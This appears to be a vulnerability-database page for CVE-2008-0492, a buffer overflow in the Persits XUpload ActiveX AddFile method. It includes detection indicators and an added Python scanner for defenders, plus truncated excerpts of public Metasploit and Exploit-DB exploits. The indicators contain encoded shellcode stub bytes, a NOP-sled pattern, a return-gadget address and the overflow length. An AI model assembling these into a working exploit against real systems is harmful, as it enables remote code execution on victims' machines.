CVE-2008-0492
Published 2008-01-30
Priority: P3 · 40 · medium · 6.8 (CVSS 2.0)
Vector: AV:N/AC:M/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 29.52% (98.0th percentile)
Stack-based buffer overflow in the Persits.XUpload.2 ActiveX control in XUpload.ocx 3.0.0.4 and earlier in Persits XUpload 3.0 allows remote attackers to execute arbitrary code via a long argument to the AddFile method. NOTE: some of these details are obtained from third party information.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| persits | xupload | — | — |
Detection & IOCs
bytes: %u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949%u4948%u4949%u4949%u4949%u4949%u4949%u5a51%u436a
bytes: %u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949%u4949%u4949%u4949%u4949%u4949%u4937%u5a51%u436a
- Detect instantiation of the Persits.XUpload.2 ActiveX control (ProgID) in browser contexts, particularly calls to the AddFile() method with an oversized string argument (>738 bytes).
- Monitor for the presence of XUpload.ocx on disk, especially versions 3.0.0.3 and 3.0.0.4, which are the confirmed vulnerable versions targeted by public exploits.
- The Metasploit exploit uses a 738-byte alpha-numeric heap spray buffer passed to AddFile(); detect JavaScript heap spray patterns using unescape() with %u9090%u9090 NOP sleds in browser memory.
- The exploit targets a pop/pop/ret gadget at offset 0x10019d6e within XUpload.ocx; detect ROP/SEH chains referencing this address in memory or crash dumps.
- The shellcode uses Alpha2 encoding; detect the characteristic Alpha2 stub header bytes %u03eb%ueb59%ue805%ufff8%uffff in network traffic or memory.
- The bind-shell payload opens TCP port 4444; monitor for unexpected inbound connections on port 4444 following browser-based ActiveX exploitation.
- The Metasploit module targets specifically XUpload.ocx version 3.0.0.3 on Windows XP SP3 with IE6 SP3; the RET address 0x10019d6e is version-specific and will not apply to other OS/browser/DLL combinations.
- The NVD advisory notes that version 3.0.0.4 and earlier are vulnerable, but the public Metasploit exploit was only confirmed against 3.0.0.3; detection rules should cover both versions.
- The exploit sets EXITFUNC=process (Metasploit) or EXITFUNC=seh (raw PoC); payload exit behavior differs between exploit variants, affecting post-exploitation forensic artifacts.
- BadChars for the payload are limited to null bytes only (\x00), meaning the shellcode is largely unrestricted; Alpha2 encoding is used in the raw PoC to bypass any additional character filtering.
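A static content check built from the indicators listed above, as an added example that is not part of the original page or of either public exploit. The function name `scan`, the verdict labels and both sample pages are constructed for illustration; it inspects saved HTML/JavaScript only and rejoins string literals split with `+` before matching.

```python
import re

PROGID = "persits.xupload.2"
ALPHA2_STUB = "%u03eb%ueb59%ue805%ufff8%uffff"  # stub header from the page's indicators
NOP_SLED = "%u9090%u9090"                       # sled pattern from the page's indicators
MAX_ARG = 738                                   # AddFile() size threshold from the page

# "abc" + "def" joins; removing them rebuilds literals split across lines.
_JOIN = re.compile(r"""(["'])\s*\+\s*\1""")
_UNESCAPE = re.compile(r"""unescape\s*\(\s*(["'])(.*?)\1""", re.I | re.S)
_ADDFILE = re.compile(r"""\.AddFile\s*\(\s*(?:(["'])(.*?)\1)?""", re.I | re.S)


def scan(content):
    """Report which CVE-2008-0492 indicators appear in HTML/JS text."""
    flat = _JOIN.sub("", content)
    escaped = [m.group(2).lower() for m in _UNESCAPE.finditer(flat)]
    calls = list(_ADDFILE.finditer(flat))
    hits = {
        "progid": PROGID in flat.lower(),
        "addfile_call": bool(calls),
        # Only literal arguments can be measured statically.
        "oversized_literal_arg": any(len(m.group(2) or "") > MAX_ARG for m in calls),
        "alpha2_stub": any(ALPHA2_STUB in s for s in escaped),
        "nop_sled": any(NOP_SLED in s for s in escaped),
    }
    payload_like = (hits["oversized_literal_arg"] or hits["alpha2_stub"]
                    or hits["nop_sled"])
    if hits["progid"] and payload_like:
        hits["verdict"] = "suspicious"
    elif hits["progid"]:
        hits["verdict"] = "control-in-use"  # inventory finding, not an alert
    else:
        hits["verdict"] = "clean"
    return hits


# Constructed samples: stub header split across two literals, no payload body.
SUSPICIOUS = r'''<script>
var sc = unescape("%u03EB%ueb59%ue805" +
                  "%ufff8%uffff%u4141");
var up = new ActiveXObject("Persits.XUpload.2");
up.AddFile(buf);
</script>'''
BENIGN = r'''<script>var up = new ActiveXObject("Persits.XUpload.2");
up.AddFile("C:\\docs\\report.pdf");</script>'''

if __name__ == "__main__":
    for name, page in (("suspicious", SUSPICIOUS), ("benign", BENIGN)):
        print(name, scan(page))
```

A `control-in-use` result is still worth recording, since the page lists XUpload.ocx 3.0.0.4 and earlier as affected.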
No detection rules found.
Exploit-DB
Persits XUpload - ActiveX AddFile Buffer Overflow (Metasploit)
exploitdb·2010-05-09
---
##
# $Id: hp_loadrunner_addfile.rb 9262 2010-05-09 17:45:00Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Persits XUpload ActiveX AddFile Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Persits Software Inc's
XUpload ActiveX control(version 3.0.0.3) thats included in HP LoadRunner 9.5.
By passing an overly long string to the AddFile method, an attacker may be
able to execute arbitrary code.
},
'License' => MSF_LICENSE,
'Autho
Exploit-DB
Persits XUpload 3.0 - 'AddFile()' Remote Buffer Overflow
exploitdb·2008-01-25
---
Persits XUpload 3.0 AddFile() Buffer Overflow Exploit
function Check() {
// win32_exec - EXITFUNC=seh CMD=c:\windows\system32\calc.exe Size=378 Encoder=Alpha2 http://metasploit.com
Metasploit
Persits XUpload ActiveX AddFile Buffer Overflow
metasploit
This module exploits a stack buffer overflow in Persits Software Inc's XUpload ActiveX control (version 3.0.0.3) that's included in HP LoadRunner 9.5. By passing an overly long string to the AddFile method, an attacker may be able to execute arbitrary code.
No writeups or analysis indexed.
http://secunia.com/advisories/28660
http://www.securityfocus.com/bid/27456
http://www.vupen.com/english/advisories/2008/0315
https://exchange.xforce.ibmcloud.com/vulnerabilities/39967
https://www.exploit-db.com/exploits/4987